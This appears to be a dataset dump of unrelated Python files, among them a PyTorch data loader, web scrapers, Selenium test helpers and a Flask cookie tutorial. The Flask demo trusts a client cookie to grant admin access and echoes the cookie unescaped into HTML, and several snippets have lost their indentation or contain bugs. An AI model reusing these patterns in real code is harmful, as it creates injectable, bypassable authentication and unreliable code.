text stringlengths 8 6.05M |
|---|
import re
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import torch
from torch.utils.data import Dataset, DataLoader
from torch._six import container_abcs, int_classes, string_classes
from torchvision import transforms
from utils.transforms import DropInfo, Cutout, GridMask
np_str_obj_array_pattern = re.compile(r'[SaUO]')
default_collate_err_msg_format = (
"default_collate: batch must contain tensors, numpy arrays, numbers, "
"dicts or lists; found {}")
def _cat_collate(batch):
r"""Puts each data field into a tensor with outer dimension batch size"""
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, torch.Tensor):
out = None
if torch.utils.data.get_worker_info() is not None:
# If we're in a background process, concatenate directly into a
# shared memory tensor to avoid an extra copy
numel = sum([x.numel() for x in batch])
storage = elem.storage()._new_shared(numel)
out = elem.new(storage)
return torch.cat(batch, 0, out=out)
elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
and elem_type.__name__ != 'string_':
elem = batch[0]
if elem_type.__name__ == 'ndarray':
# array of string classes and object
if np_str_obj_array_pattern.search(elem.dtype.str) is not None:
raise TypeError(default_collate_err_msg_format.format(elem.dtype))
return _cat_collate([torch.as_tensor(b) for b in batch])
elif elem.shape == (): # scalars
return torch.as_tensor(batch)
elif isinstance(elem, float):
return torch.tensor(batch, dtype=torch.float64)
elif isinstance(elem, int_classes):
return torch.tensor(batch)
elif isinstance(elem, string_classes):
return batch
elif isinstance(elem, container_abcs.Mapping):
return {key: _cat_collate([d[key] for d in batch]) for key in elem}
elif isinstance(elem, tuple) and hasattr(elem, '_fields'): # namedtuple
return elem_type(*(_cat_collate(samples) for samples in zip(*batch)))
elif isinstance(elem, container_abcs.Sequence):
transposed = zip(*batch)
return [_cat_collate(samples) for samples in transposed]
raise TypeError(default_collate_err_msg_format.format(elem_type))
class BengaliDataset(Dataset):
    """Class to get images and labels.

    Attributes:
        images = [ndarray] images array with shape (N, SIZE, SIZE)
        drop_info_fn = [object] function to drop information from images
        transform = [Compose] transformation applied to each image
        labels = [torch.Tensor] image labels tensor of shape (N, 3)
        mod_counts = [torch.Tensor] remainders of dividing each class
            frequency by the highest frequency
        ratio_counts = [torch.Tensor] floors of dividing each class
            frequency by the highest frequency
        current_counts = [torch.Tensor] number of retrieved items of each
            class in current iteration of epoch
        balance = [bool] whether or not to perform class balancing
    """

    def __init__(self, images, labels, augment=False, drop_info_fn=None,
                 balance=False):
        """Initialize dataset.

        Args:
            images = [ndarray] images array with shape (N, SIZE, SIZE)
            labels = [DataFrame] image labels DataFrame of shape (N, 3)
            augment = [bool] whether or not the images are augmented
            drop_info_fn = [str] whether to use cutout ('cutout'), GridMask
                ('gridmask'), or no info dropping algorithm (None)
            balance = [bool] whether or not the classes are balanced
        """
        # BUG FIX: was super(Dataset, self).__init__(), which starts the MRO
        # lookup *after* Dataset and thus skips Dataset's own initializer
        super().__init__()
        self.images = images

        # initialize information dropping algorithm
        image_size = images.shape[-1]
        if drop_info_fn == 'cutout':
            self.drop_info_fn = Cutout(1, image_size // 2)
        elif drop_info_fn == 'gridmask':
            self.drop_info_fn = GridMask(0.5, image_size * 7 // 16, image_size)
        else:
            self.drop_info_fn = DropInfo()

        # initialize chosen transformation
        if augment:
            # initialize affine, normalizing, and info dropping transformations
            self.transform = transforms.Compose([
                transforms.ToPILImage(),
                transforms.RandomAffine(
                    degrees=(-8, 8),
                    translate=(1/24, 1/24),
                    scale=(8/9, 10/9)
                ),
                transforms.ToTensor(),
                transforms.Normalize(mean=(0.071374745,), std=(0.20761949,)),
                self.drop_info_fn
            ])
        else:
            # initialize normalizing transformation
            self.transform = transforms.Compose([
                transforms.ToTensor(),
                transforms.Normalize(mean=(0.071374745,), std=(0.20761949,))
            ])

        # initialize labels and counts for class balancing
        self.labels = torch.tensor(labels.to_numpy())
        counts = labels.apply(pd.Series.value_counts).to_numpy().T
        max_counts = np.nanmax(counts, axis=1, keepdims=True)
        self.mod_counts = torch.tensor(max_counts % counts)
        self.ratio_counts = torch.tensor(max_counts // counts)
        self.current_counts = torch.zeros_like(self.mod_counts)
        self.balance = balance

    def reset(self, epoch, num_epochs):
        """Reset class balancing and information dropping algorithms.

        Args:
            epoch = [int] current epoch of training loop starting with 1
            num_epochs = [int] total number of iterations over the training data
        """
        self.current_counts = torch.zeros_like(self.mod_counts)
        # ramp the info-dropping probability up over training, capped at 0.8
        self.drop_info_fn.prob = min(epoch / num_epochs, 0.8)

    def __len__(self):
        return len(self.images)

    def _num_augmentations(self, labels, max_augments=20):
        """Computes number of augmentations for given image labels.

        Args:
            labels = [torch.Tensor] image labels of shape (3,)
            max_augments = [int] maximum number of augmentations per image

        Returns [torch.Tensor]:
            If self.balance is False, a tensor filled with ones is returned.
            Otherwise, the number of augmentations will ensure that all the
            classes are seen the same number of times for each sub-problem,
            with a maximum of max_augments augmentations per sub-problem.
        """
        if not self.balance:  # one augmentation
            return torch.tensor([1]*len(labels))

        # select current and modular counts for given labels
        current_counts = self.current_counts[[0, 1, 2], labels]
        self.current_counts[[0, 1, 2], labels] += 1
        mod_counts = self.mod_counts[[0, 1, 2], labels]

        # determine number of augmentations with possible extra augmentation
        extra_augment = current_counts < mod_counts
        num_augments = self.ratio_counts[[0, 1, 2], labels] + extra_augment
        num_augments = num_augments.clamp(max=max_augments)
        return num_augments.long()

    def __getitem__(self, idx):
        """Get images, labels, and number of augmentations.

        Args:
            idx = [int] index of original image and labels

        Returns [torch.Tensor]*5:
            images = images tensor of shape (N, 1, SIZE, SIZE)
            labels_graph = labels tensor of grapheme_root sub-problem
            labels_vowel = labels tensor of vowel_diacritic sub-problem
            labels_conso = labels tensor of consonant_diacritic sub-problem
            num_augments = number of augmentations of shape (1, 3)
        """
        # select image and labels
        image = self.images[idx]
        labels = self.labels[idx]

        # determine number of augmentations per sub-problem
        num_augments = self._num_augmentations(labels)

        # transform or normalize image; one copy per required augmentation
        images = []
        for _ in range(max(num_augments)):
            images.append(self.transform(image))
        images = torch.stack(images)

        # repeat labels given number of augmentations
        labels = [label.repeat(n) for label, n in zip(labels, num_augments)]

        # return images, labels, and number of augmentations as a 5-tuple
        return (images,) + tuple(labels) + (num_augments.unsqueeze(0),)
def load_data(images_path, labels_path, test_ratio, seed, augment, drop_info_fn,
              balance, batch_size):
    """Load the images and labels from storage into DataLoader objects.

    Args:
        images_path = [str] path for the images .npy file
        labels_path = [str] path for the labels CSV file
        test_ratio = [float] percentage of data used for validation
        seed = [int] seed used for consistent data splitting
        augment = [bool] whether or not the images are transformed
        drop_info_fn = [str] whether to use cutout ('cutout'), GridMask
            ('gridmask'), or no info dropping algorithm (None)
        balance = [bool] whether or not the classes are balanced
        batch_size = [int] batch size of the DataLoader objects

    Returns:
        train_dataset = [BengaliDataset] data set of the training data
        train_loader = [DataLoader] DataLoader of the training data
        val_loader = [DataLoader] DataLoader of the validation data
        image_size = [int] length of square images in pixels
    """
    all_images = np.load(images_path)
    # drop the id column (first) and grapheme column (last)
    all_labels = pd.read_csv(labels_path).iloc[:, 1:-1]

    # split data into train and validation splits with a fixed seed
    train_images, val_images, train_labels, val_labels = train_test_split(
        all_images, all_labels, test_size=test_ratio, random_state=seed)

    # training set: shuffled, augmented, optionally class-balanced
    train_dataset = BengaliDataset(train_images, train_labels,
                                   augment, drop_info_fn, balance)
    train_loader = DataLoader(train_dataset, shuffle=True, num_workers=4,
                              batch_size=batch_size, collate_fn=_cat_collate)

    # validation set: no augmentation, no balancing
    val_loader = DataLoader(BengaliDataset(val_images, val_labels),
                            batch_size=batch_size,
                            num_workers=4, collate_fn=_cat_collate)

    return train_dataset, train_loader, val_loader, all_images.shape[-1]
|
import sys


def main():
    """Split a text file so each '.'/'!'-terminated sentence is on its own line.

    Reads the file named by sys.argv[1], skips blank lines, and writes the
    result to 'new-<filename>'. The single character following a '.' or '!'
    (assumed to be the separating space) is dropped.
    """
    if len(sys.argv) != 2:
        print("Must call program: PROGRAM_NAME FILENAME")
        exit()
    print("Opening " + sys.argv[1] + "...\n")
    export = "new-" + sys.argv[1]
    print("Converting and exporting to " + export + "...\n")
    # context managers guarantee both files are closed even on error
    # (the original left the output file unclosed on any exception)
    with open(sys.argv[1]) as input_file, open(export, "w+") as out_file:
        del_space = False
        for line in input_file:
            if line == "\n":
                continue
            for ch in line:
                if del_space:
                    # drop the one character after the sentence terminator
                    del_space = False
                    continue
                out_file.write(ch)
                if ch == "." or ch == "!":
                    out_file.write("\n")
                    del_space = True
    print("Done!\n")


if __name__ == "__main__":
    main()
|
import pandas as pd
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from utils.data import data_frames, ForecastDataset
from nn import Model
def infer(model, loader):
    """Infer unit sales of next days with a trained model.

    Projections are built autoregressively: each step's output is written
    back into `projections` and fed into later steps as input.

    Args:
        model = [nn.Module] trained model
        loader = [DataLoader] DataLoader with last year of available data
    Returns [[torch.Tensor]*2]:
        validation = sales projections of next 28 days
        evaluation = sales projections of 28 days after validation days
    """
    # initialize projections as tensor
    # one row per loader step, one column per store-item group
    projections = torch.empty(len(loader), ForecastDataset.num_groups)
    with torch.no_grad():
        for i, (day, items, sales) in enumerate(tqdm(loader)):
            # find missing sales in projections
            # NOTE(review): the offset `sales.shape[1] - 2 + i` is taken on
            # faith from ForecastDataset's windowing; when start_idx >= i the
            # slice below is empty — confirm against the dataset layout
            start_idx = sales.shape[1] - 2 + i
            projection = projections[start_idx:i]
            # add batch dim in front and feature dim at the end
            projection = projection[None, ..., None]
            # concatenate inputs
            sales = torch.cat((sales, projection), dim=1)
            items = torch.cat((items, sales), dim=-1)
            # add new projections based on old projections
            # first time step conditions, remaining steps are predicted
            y = model(day[:, :1], day[:, 1:], items[:, :1], items[:, 1:])
            projections[i] = y.cpu()
    # select validation and evaluation projections from all projections
    validation = projections[-56:-28].T
    evaluation = projections[-28:].T
    return validation, evaluation
if __name__ == '__main__':
    from datetime import datetime

    start_time = datetime.now()

    # hyperparameters and paths (must match the trained checkpoint)
    device = torch.device('cuda')
    num_models = 300   # number of submodels
    num_days = 1000    # number of days prior the days with missing sales
    num_hidden = 6     # number of hidden units per store-item group
    dropout = 0.99     # probability of dropping inter-group weight grad
    model_path = 'models/model.pt'  # path to trained model
    submission_path = 'submission.csv'
    path = r'D:\Users\Niels-laptop\Documents\2019-2020\Machine Learning in Practice\Competition 2\project'

    calendar, prices, sales = data_frames(path)

    # keep the trailing num_days window plus the days still missing sales
    num_extra_days = calendar.shape[0] - (sales.shape[1] - 6)
    calendar = calendar.iloc[-num_days - num_extra_days - 29:-28]
    # keep the 6 meta columns plus the matching window of sales columns
    sales = pd.concat(
        (sales.iloc[:, :6], sales.iloc[:, -num_days - 29:-28]), axis=1)

    # DataLoader over the inference window
    loader = DataLoader(ForecastDataset(calendar, prices, sales, horizon=0))

    # restore the trained model on the requested device
    model = Model(num_models, num_hidden, dropout, device)
    model.load_state_dict(torch.load(model_path, map_location=device))
    model.reset_hidden()
    model.eval()

    # run model to get sales projections
    validation, evaluation = infer(model, loader)

    # wrap the 28 validation-day projections in a submission-style frame
    day_columns = [f'F{i}' for i in range(1, 29)]
    validation = pd.DataFrame(validation.tolist(), columns=day_columns)
    validation = pd.concat((sales[['id']], validation), axis=1)

    # same for the evaluation days, rewriting the id suffix
    eval_id_col = sales[['id']].applymap(lambda x: x[:-10] + 'evaluation')
    evaluation = pd.DataFrame(evaluation.tolist(), columns=day_columns)
    evaluation = pd.concat((eval_id_col, evaluation), axis=1)

    # stack both halves and write the submission file
    projections = pd.concat((validation, evaluation), axis=0)
    projections.to_csv(submission_path, index=False)

    print('Time for inference:', datetime.now() - start_time)
|
from pcc_stats import diehard_pybites, Stats
def test_diehard_pybites():
    """diehard_pybites() reports clamytoe's most-completed challenge."""
    expected = Stats(user='clamytoe', challenge=('01', 7))
    assert diehard_pybites() == expected
import urllib3
from urllib.parse import urlparse
from bs4 import BeautifulSoup
PAGE_NOT_FOUND = "Page not found"
MEDIA_NOT_FOUND = "Media not found"
class HeadlineCrawler(object):
    """Fetches a web page and splits its <title> into headline and outlet."""

    def __init__(self):
        # one pooled HTTP client reused across requests
        self.http = urllib3.PoolManager()

    def crawl_url_title(self, url):
        """Return (headline, media name) parsed from the page title of *url*.

        The title is split at the last '-', '|', or em-dash; the part before
        it is the headline, the part after it the news outlet. Falls back to
        the NOT_FOUND sentinels when the page has no usable title.
        """
        # FIX: pin the parser; without it BeautifulSoup guesses and emits a
        # GuessedAtParserWarning, and results vary with installed parsers
        soup = BeautifulSoup(self.http.request('GET', url).data, 'html.parser')
        if soup.title is None or soup.title.string is None:
            return PAGE_NOT_FOUND, MEDIA_NOT_FOUND
        raw_title = soup.title.string
        last_hyphen_idx = raw_title.rfind("-")
        last_pipe_idx = raw_title.rfind("|")
        last_dash_idx = raw_title.rfind("—")
        split_idx = max([last_hyphen_idx, last_pipe_idx, last_dash_idx])
        if split_idx == -1:
            # no separator: the whole title is the headline
            return raw_title, MEDIA_NOT_FOUND
        # FIX: strip the media name too — it previously kept the leading
        # space that follows the separator, unlike the stripped title
        title = raw_title[:split_idx].strip()
        news_media = raw_title[split_idx + 1:].strip()
        return title, news_media
def extract_home_url(full_url):
    """Return the scheme+host root of *full_url*, e.g. 'https://x.com/'."""
    parts = urlparse(full_url)
    return '{}://{}/'.format(parts.scheme, parts.netloc)
|
from code import Dog
class PetDog(Dog):
    """A pet dog; currently adds no behavior beyond Dog."""

    # BUG FIX: the original line `def __init__ (self, )` was a syntax error
    # (trailing comma in the parameter list and a missing colon)
    def __init__(self):
        # NOTE(review): Dog.__init__ is not visible here, so it is deliberately
        # not invoked (matching the original `pass` body) — confirm Dog needs
        # no initialization before relying on PetDog instances
        pass
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
from bs4 import BeautifulSoup
import ast
webpage = "http://www.dwd.de/DE/wetter/wetter_weltweit/europa/wetterwerte/_node.html"
try:
web_page = urllib2.urlopen(webpage)
except urllib2.HTTPError:
print("HTTPERROR!")
except urllib2.URLError:
print("URLERROR!")
if web_page:
soup = BeautifulSoup(web_page,'lxml')
soup.prettify('utf-8')
c = soup.find('div', {'id':'wettertab'})
e = c.find('tbody')
results = {}
for row in e.findAll('tr'):
aux = row.findAll('td')
stadt = str(aux[0].contents[0].strip().encode("utf-8"))
results[stadt] = {}
results[stadt]['hoehe'] = aux[1].contents[0].strip().encode("utf-8")
results[stadt]['luftdruck'] = aux[2].contents[0].strip().encode("utf-8")
results[stadt]['temperatur'] = aux[3].contents[0].strip().encode("utf-8")
results[stadt]['windspitzen'] = aux[4].contents[0].strip().encode("utf-8")
results[stadt]['windrichtung'] = aux[5].contents[0].strip().encode("utf-8")
results[stadt]['windgeschwindigkeit'] = aux[6].contents[0].strip().encode("utf-8")
results[stadt]['wolken'] = aux[7].contents[0].strip().encode("utf-8")
results[stadt]['boehen'] = aux[8].contents[0].strip().encode("utf-8")
for stadt in results:
print stadt, 'Daten ', results[stadt]
|
def share_price(invested, changes):
    """Apply successive percentage *changes* to *invested* capital.

    Args:
        invested: starting amount (int or float)
        changes: iterable of per-period percentage changes (e.g. 10 = +10%)

    Returns:
        The final value formatted as a string with two decimals.
    """
    # BUG FIX: the original used `reduce`, which is not a builtin on
    # Python 3 and was never imported; a plain loop needs no import
    price = float(invested)
    for percent in changes:
        price += price * (percent / 100.0)
    return '{:.2f}'.format(price)
|
import codecs
import csv
from datetime import timedelta
import io
import subprocess
from time import sleep
import localSettings
import requests
from selenium.webdriver.common.action_chains import ActionChains
from logger import *
# Read from testPartners csv the test details(base URL, credentials, Practitest ID
def updateTestCredentials(case_str):
    """Load partner credentials and URLs for the given test case.

    Looks up *case_str* in the environment-specific testPartners CSV and, on
    a match, mutates the localSettings globals (partner, login/admin
    credentials) and derives the KMS URLs via setTestURLs().

    Args:
        case_str: value of the 'case' column identifying the test row

    Returns:
        True when a matching row was found and applied, False otherwise.
    """
    found = False
    # file name pattern: testPartners<ENV>[NewUI].csv under <KMS_WEB_DIR>/ini
    if localSettings.LOCAL_SETTINGS_IS_NEW_UI == True:
        newuiStr = "NewUI"
    else:
        newuiStr = ""
    testPartnersPath=os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testPartners' + localSettings.LOCAL_SETTINGS_RUN_ENVIRONMENT + newuiStr + '.csv'))
    # NOTE(review): `os` is not imported in this module directly — presumably
    # provided by `from logger import *`; confirm
    with codecs.open(testPartnersPath,'r',encoding='utf8') as csv_mat: #windows
        testPartners = csv.DictReader(csv_mat)
        for row in testPartners:
            if (row['case'] == case_str):
                # SET PARTNER DETAILS
                localSettings.LOCAL_SETTINGS_PARTNER = row['partner']
                localSettings.LOCAL_SETTINGS_LOGIN_USERNAME = row['login_username']
                localSettings.LOCAL_SETTINGS_LOGIN_PASSWORD = row['login_password']
                localSettings.LOCAL_SETTINGS_ADMIN_USERNAME = row['admin_username']
                localSettings.LOCAL_SETTINGS_ADMIN_PASSWORD = row['admin_password']
                # SET KMS URLS
                setTestURLs(row)
                found = True
                break
    return found
def getPartnerDetails(partner):
    """Look up (serverUrl, adminSecret) for *partner* in ini/partnerDetails.csv.

    Returns (None, None) when the partner id is not present.
    """
    details_path = os.path.abspath(os.path.join(
        localSettings.LOCAL_SETTINGS_KMS_WEB_DIR, 'ini', 'partnerDetails.csv'))
    with open(details_path, 'r') as details_file:
        for record in csv.DictReader(details_file):
            if record['partnerId'] == partner:
                return record['serverUrl'], record['adminSecret']
    return None, None
def setTestURLs(row):
    """Populate the localSettings URL globals for the application under test.

    Derives the base URL and per-page URLs (login, my-media, admin, ...)
    according to which application is being tested (MediaSpace, Blackboard,
    or SharePoint).

    Args:
        row: CSV row dict with at least 'partner' and 'base_url' keys
            (used only for the MediaSpace branch)
    """
    # NOTE(review): `enums` is not imported in this module directly —
    # presumably provided by `from logger import *`; confirm
    if localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.MEDIA_SPACE:
        # MediaSpace: base URL is <prefix><partner>.<base_url>
        localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_URL_PREFIX + row['partner'] + '.' + row['base_url']
        localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/user/login'
        localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-media'
        localSettings.LOCAL_SETTINGS_KMS_MY_PLAYLISTS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-playlists'
        localSettings.LOCAL_SETTINGS_KMS_ADMIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/admin'
        localSettings.LOCAL_SETTINGS_KMS_MY_CHANNELS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-channels'
        localSettings.LOCAL_SETTINGS_KMS_MY_HISTORY_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/history'
        localSettings.LOCAL_SETTINGS_KMS_CHANNELS_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/channels'
        localSettings.LOCAL_SETTINGS_KMS_MEDIA_SELECTION_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/quiz/entry/add-quiz/context/'
    elif localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.BLACK_BOARD:
        # Blackboard KAF: fixed base URL from settings
        localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_KAF_BLACKBOARD_BASE_URL
        localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + ''
        localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/webapps/osv-kaltura-BBLEARN/jsp/myMediaLTI.jsp'
    elif localSettings.LOCAL_SETTINGS_APPLICATION_UNDER_TEST == enums.Application.SHARE_POINT:
        # SharePoint KAF: fixed base URL from settings
        localSettings.LOCAL_SETTINGS_TEST_BASE_URL = localSettings.LOCAL_SETTINGS_KAF_SHAREPOINT_BASE_URL
        localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/Home.aspx'
        localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/My%20Media.aspx'
    return
#===============================================================================
#Take screenshoot of whole screen.
#'fullpath' should contain the file name with its extension PNG!
#===============================================================================
def saveScreenshotToFile(driver, fullPath):
    """Capture a screenshot of the whole screen.

    'fullPath' must contain the file name with its PNG extension.
    Returns whatever driver.save_screenshot returns (True on success).
    """
    absolute_path = os.path.abspath(fullPath)
    return driver.save_screenshot(absolute_path)
#===============================================================================
# Convert time to secods.
# Example "0:04:15" would produce an output of 255; "0:00:25" would produce an output of 25
#===============================================================================
def convertTimeToSecondsHMMSS(test, s):
    """Convert an 'H:MM:SS' string to total seconds.

    Example: "0:04:15" -> 255. The 'test' argument is unused but kept for
    existing callers.
    """
    parts = s.split(':')
    return 3600 * int(parts[0]) + 60 * int(parts[1]) + int(parts[2])
#===============================================================================
# Convert time to secods.
# Example "0:15" would produce an output of 15; "1:25" would produce an output of 85
#===============================================================================
def convertTimeToSecondsMSS(s):
    """Convert an 'M:SS' string to total seconds.

    Example: "0:15" -> 15; "1:25" -> 85.
    """
    minutes, seconds = s.split(':')[0], s.split(':')[1]
    return int(int(minutes) * 60 + int(seconds))
def getTimerInSeconds(driver, player):
    """Read the player's current-time element and return it as seconds (M:SS)."""
    timer_element = player.getCurrentTimeElement(driver)
    return convertTimeToSecondsMSS(timer_element.text)
#===============================================================================
# Generate timestamp DDmmYYHHMMSS
#===============================================================================
def generateTimeStamp():
    """Return the current local time as a 'DDMMYYYYHHMMSS' digit string."""
    now = datetime.datetime.fromtimestamp(time.time())
    return now.strftime('%d%m%Y%H%M%S')
#===============================================================================
# Run any shell command
#===============================================================================
def runProcess(self, exe):
    """Run a shell command and return its captured stdout, or None when empty.

    The 'self' argument is unused but kept for existing callers.
    """
    process = subprocess.Popen(exe, stdout=subprocess.PIPE)
    captured = process.stdout.read()
    # keep the explicit != "" test: on Python 3 stdout is bytes, so even an
    # empty b"" compares unequal to "" and is returned as-is
    if captured != "":
        return captured
    return None
#===============================================================================
# Return the HTTP response code as integer
#===============================================================================
def getUrlResponseCode(url):
    """Return the HTTP status code of a HEAD request to *url*.

    Returns None (after logging) when the connection fails.
    """
    try:
        response = requests.head(url)
    except requests.ConnectionError:
        writeToLog("DEBUG","failed to connect")
        return None
    return response.status_code
#===============================================================================
# Return true if the URL response code is 200 (OK)
#===============================================================================
def isUrlResponse200(url):
    """Return True when *url* answers a HEAD request with HTTP 200 (OK)."""
    return getUrlResponseCode(url) == 200
def wait_for_page_readyState(driver, timeout=30):
    """Poll document.readyState once per second until 'complete' or timeout.

    Args:
        driver: selenium WebDriver used to run the readyState script
        timeout: maximum number of polls (one per second)

    Returns:
        True when the page reported 'complete' in time, False otherwise.
    """
    page_state = ''
    for _ in range(timeout):
        if page_state == 'complete':
            break
        page_state = driver.execute_script('return document.readyState;')
        sleep(1)
    return page_state == 'complete'
def isAutoEnvironment():
    """Return True when the ENV_AUTO environment variable equals 'Auto'."""
    return os.getenv('ENV_AUTO') == 'Auto'
# Delete old filed from the log folder
# fileType - Exmaple: '.png'
def clearFilesFromLogFolderPath(fileType):
    """Delete all files with the given extension (e.g. '.png') from the log folder."""
    folder = getLogFileFolderPath()
    for file_name in os.listdir(folder):
        if file_name.endswith(fileType):
            os.remove(os.path.join(folder, file_name))
# @Author: Oleg Sigalov
# Get all instances from csv file
def getListOfInstances():
    """Read all instances from the environment-specific testPartners CSV.

    Returns:
        dict mapping instance id -> (adminUsername, adminPassword) for every
        row whose partner id starts with four digits.
    """
    instances = {}
    suffix = 'NewUI' if localSettings.LOCAL_SETTINGS_IS_NEW_UI == True else ''
    matrix_path = os.path.abspath(os.path.join(
        localSettings.LOCAL_SETTINGS_KMS_WEB_DIR, 'ini',
        'testPartners' + localSettings.LOCAL_SETTINGS_RUN_ENVIRONMENT + suffix + '.csv'))
    with open(matrix_path, 'r') as csv_file:  # windows
        for record in csv.DictReader(csv_file):
            # rows whose partner id begins with four digits are instances
            if record['partner'][:4].isdigit():
                instances[record['partner']] = (record['admin_username'],
                                                record['admin_password'])
    return instances
|
'''
Created on Jul 14, 2013
@author: Justin
'''
import os
from webapp2 import WSGIApplication, Route
from google.appengine.ext import db
root_dir = os.path.dirname(__file__)
template_dir = os.path.join(root_dir, 'templates')
class Users(db.Model):
    """Datastore model for a registered user account."""
    u_name = db.StringProperty(required = True)  # login name
    p_hash = db.StringProperty(required = True)  # password hash (never plaintext)
    email = db.StringProperty(required = True)
class Drinks(db.Model):
    """Datastore model for a drink recipe."""
    d_name = db.StringProperty(required = True)
    instructions = db.TextProperty(required = True)  # mixing instructions
    rating = db.IntegerProperty(required = False)  # optional aggregate rating
class Ingredients(db.Model):
    """Datastore model for a single ingredient name."""
    i_name = db.StringProperty(required = True)
class Measurements(db.Model):
    """Join model: how much of which ingredient a drink uses."""
    d_id = db.IntegerProperty(required = True)  # Drinks entity id
    i_id = db.IntegerProperty(required = True)  # Ingredients entity id
    quantity = db.IntegerProperty(required = True)
    measurement = db.StringProperty(required = True)  # unit, e.g. 'oz'
class Reviews(db.Model):
    """A user's rating (and optional text review) of a drink."""
    u_id = db.IntegerProperty(required = True)  # Users entity id
    d_id = db.IntegerProperty(required = True)  # Drinks entity id
    rating = db.IntegerProperty(required = True)
    review = db.TextProperty(required = False)
class Favorites(db.Model):
    """A user's bookmarked drink, with an optional personal rating."""
    u_id = db.IntegerProperty(required = True)  # Users entity id
    d_id = db.IntegerProperty(required = True)  # Drinks entity id
    rating = db.IntegerProperty(required = False)
# WSGI route table; handlers are given as dotted strings so webapp2
# imports them lazily on first request
app = WSGIApplication([
    Route(r'/', handler='modules.homepage.HomePage', name='homepage'),
    Route(r'/login', handler='modules.authentication.Login', name='login'),
    Route(r'/signup', handler='modules.authentication.SignUp', name='signup'),
    Route(r'/logout', handler='modules.authentication.LogOut', name='logout')],
    debug=True)
'''
# Create the WSGI application and define route handlers
app = WSGIApplication([
Route(r'/', handler='modules.mainpage.MainPage', name='mainpage'),
Route(r'/login', handler='modules.authentication.Login', name='login'),
Route(r'/signup', handler='modules.authentication.SignUp', name='signup'),
Route(r'/logout', handler='modules.authentication.Logout', name='logout'),
Route(r'/newbj', handler='modules.game.NewBlackjack', name='newbj'),
Route(r'/insurancebj', handler='modules.game.InsuranceBlackjack', name='insurancebj'),
Route(r'/loseins', handler='modules.game.LoseInsurance', name='loseins'),
Route(r'/playbj', handler='modules.game.PlayBlackjack', name='playbj'),
#Route(r'/resetchips', handler='modules.game.ResetChips', name='resetchips'),
Route(r'/resultsbj', handler='modules.game.ResultsBlackjack', name='resultsbj')],
debug=True)
'''
#if __name__ == '__main__':
# pass |
#!/usr/bin/python3
"""
Making use of HTTP non-200 type responses.
https://tools.ietf.org/html/rfc2616 # rfc spec describing HTTP
1xx - informational
2xx - success / ok
3xx - redirection
4xx - errors
5xx - server errors
"""
from flask import Flask
from flask import redirect
from flask import url_for
from flask import render_template
from flask import request
from flask import abort
from flask import make_response
app = Flask(__name__)
# table header shown on every host listing page
header = ["Host Name","IP Address","Domain Name"]
# in-memory host table (mutated by /appendgrp; lost on restart)
groups = [{"hostname": "hostA","ip": "192.168.30.22", "fqdn": "hostA.localdomain"},
          {"hostname": "hostB", "ip": "192.168.30.33", "fqdn": "hostB.localdomain"},
          {"hostname": "hostC", "ip": "192.168.30.44", "fqdn": "hostC.localdomain"}]
# set the cookie and redirect to "showtbl"
@app.route("/setcookie", methods = ["POST", "GET"])
def setcookie():
# if user generates a POST to our API
if request.method == "POST":
if request.form.get("nm"): # if nm was assigned via the POST
#if request.form["nm"] <-- this also works, but returns ERROR if no nm
user = request.form.get("nm") # grab the value of nm from the POST
else: # if a user sent a post without nm then assign value defaultuser
user = "defaultuser"
print("in setcookie.......")
# instantiate a response object
#resp = make_response(render_template("readcookie.html"))
#resp = make_response(render_template('login.html'))
resp = make_response(render_template('redirect.html'))
#resp = make_response()
# add a cookie to our response object
#cookievar #value
print("here2")
#resp.set_cookie("userID", name)
resp.set_cookie("userID", user)
return resp
#return redirect(url_for("showtbl")) # redirect to display groups table
if request.method == "GET": # if the user sends a GET
return redirect(url_for("index")) # redirect to index
# if user sends GET to / (root)
@app.route("/")
def index():
return render_template("login.html") # found in templates/
# if user sends GET or POST to /login
@app.route("/login", methods = ["POST", "GET"])
def login():
# if user sent a POST
if request.method == "POST":
# if the POST contains 'admin' as the value for 'username'
#if request.form["username"] == "admin" :
print("here1")
if request.cookies.get["user"] == "admin":
return redirect(url_for("showtbl")) # return a 302 redirect to /showtbl
else:
abort(401) # if they didn't supply the username 'admin' send back a 401
elif request.method == "GET":
return redirect(url_for("index")) # if they sent a GET to /login send 302 redirect to /
# check users cookie for their name
@app.route("/getcookie")
def getcookie():
print("in getcookie() ....................")
# attempt to read the value of userID from user cookie
name = request.cookies.get("userID") # preferred method
# name = request.cookies["userID"] # <-- this works but returns error
# if value userID is not in cookie
# return HTML embedded with name (value of userID read from cookie)
return f'<h1>Welcome {name}</h1>'
# if user sends POST to /addgrp
@app.route("/addgrp", methods = ["GET", "POST"])
def addgrp():
return render_template("addgroups.html",headings=header,data=groups) # found in templates/
# if user sends POST to /noaction
@app.route("/noaction", methods = ["POST"])
def noaction():
return redirect(url_for("showtbl")) # redirect to display groups table
# if user sends POST to /appendgrp
